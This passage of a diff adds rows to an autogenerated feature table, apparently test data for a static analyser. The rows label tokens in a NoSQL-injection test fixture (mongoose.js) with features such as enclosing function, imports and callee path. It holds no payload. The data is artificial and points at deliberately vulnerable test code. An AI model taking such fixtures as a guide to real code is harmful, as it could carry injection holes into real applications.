getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | (err) = ... (query) | CalleeFlexibleAccessPath | Document.findOne().then | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | (err) = ... (query) | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | (err) = ... (query) | calleeImports | mongoose | @@ -2661,6 +13432,42 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | (err) = ... (query) | contextSurroundingFunctionParameters | (req, res)\n(err) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | (err) = ... (query) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | (err) = ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | exceptional return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:30:90:54 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:31:90:33 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:31:90:33 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:31:90:33 | err | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:31:90:33 | err | contextSurroundingFunctionParameters | (req, res)\n(err) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:31:90:33 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:31:90:33 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:31:90:33 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:31:90:33 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:41 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:41 | err | contextSurroundingFunctionParameters | (req, res)\n(err) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:41 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:41 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:47 | err.count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:47 | err.count | contextSurroundingFunctionParameters | (req, res)\n(err) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:47 | err.count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:47 | err.count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:54 | err.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:54 | err.count(query) | contextSurroundingFunctionParameters | (req, res)\n(err) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:54 | err.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:54 | err.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:54 | exceptional return of err.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:54 | exceptional return of err.count(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:54 | exceptional return of err.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:39:90:54 | exceptional return of err.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:43:90:47 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:43:90:47 | count | contextSurroundingFunctionParameters | (req, res)\n(err) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:43:90:47 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:43:90:47 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:49:90:53 | query | CalleeFlexibleAccessPath | err.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:49:90:53 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:49:90:53 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | @@ -2668,6 +13475,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:49:90:53 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:49:90:53 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:90:49:90:53 | query | receiverName | err | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:14 | Document.find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:14 | Document.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:14 | Document.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:14 | Document.find | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:52 | Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:52 | Documen ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:52 | Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:52 | Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:52 | exceptional return of Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:52 | exceptional return of Documen ... query)) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:52 | exceptional return of Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:2:92:52 | exceptional return of Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:11:92:14 | find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:11:92:14 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:11:92:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:11:92:14 | find | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:16:92:16 | X | CalleeFlexibleAccessPath | Document.find | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:16:92:16 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:16:92:16 | X | calleeImports | mongoose | @@ -2676,6 +13503,14 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:16:92:16 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:16:92:16 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:16:92:16 | X | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:18 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:18 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:18 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:18 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | (err, r ... (query) | CalleeFlexibleAccessPath | Document.find | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | (err, r ... (query) | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | (err, r ... (query) | calleeImports | mongoose | @@ -2684,12 +13519,80 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | (err, r ... (query) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | (err, r ... (query) | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | (err, r ... (query) | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | exceptional return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:19:92:51 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:20:92:22 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:20:92:22 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:20:92:22 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:20:92:22 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:25:92:27 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:25:92:27 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:25:92:27 | res | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:25:92:27 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:25:92:27 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:25:92:27 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:25:92:27 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:25:92:27 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:35 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:35 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:35 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:35 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:38 | res[i] | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:38 | res[i] | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:38 | res[i] | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:38 | res[i] | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:44 | res[i].count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:44 | res[i].count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:44 | res[i].count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:44 | res[i].count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:51 | exceptional return of res[i].count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:51 | exceptional return of res[i].count(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:51 | exceptional return of res[i].count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:51 | exceptional return of res[i].count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:51 | res[i].count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:51 | res[i].count(query) | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:51 | res[i].count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:33:92:51 | res[i].count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:37:92:37 | i | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:37:92:37 | i | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:37:92:37 | i | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:37:92:37 | i | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:40:92:44 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:40:92:44 | count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:40:92:44 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:40:92:44 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:46:92:50 | query | CalleeFlexibleAccessPath | res.?.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:46:92:50 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:46:92:50 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:46:92:50 | query | contextSurroundingFunctionParameters | (req, res)\n(err, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:46:92:50 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:92:46:92:50 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:14 | Document.find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:14 | Document.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:14 | Document.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:14 | Document.find | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:49 | Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:49 | Documen ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:49 | Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:49 | Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:49 | exceptional return of Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:49 | exceptional return of Documen ... query)) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:49 | exceptional return of Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:2:93:49 | exceptional return of Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:11:93:14 | find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:11:93:14 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:11:93:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:11:93:14 | find | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:16:93:16 | X | CalleeFlexibleAccessPath | Document.find | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:16:93:16 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:16:93:16 | X | calleeImports | mongoose | @@ -2698,6 +13601,14 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:16:93:16 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:16:93:16 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:16:93:16 | X | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:18 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:18 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:18 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:18 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | (err, r ... (query) | CalleeFlexibleAccessPath | Document.find | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | (err, r ... (query) | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | (err, r ... (query) | calleeImports | mongoose | @@ -2706,6 +13617,46 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | (err, r ... (query) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | (err, r ... (query) | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | (err, r ... (query) | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | exceptional return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:19:93:48 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:20:93:22 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:20:93:22 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:20:93:22 | err | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:20:93:22 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:20:93:22 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:20:93:22 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:20:93:22 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:20:93:22 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:25:93:27 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:25:93:27 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:25:93:27 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:25:93:27 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:35 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:35 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:35 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:35 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:41 | err.count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:41 | err.count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:41 | err.count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:41 | err.count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:48 | err.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:48 | err.count(query) | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:48 | err.count(query) | 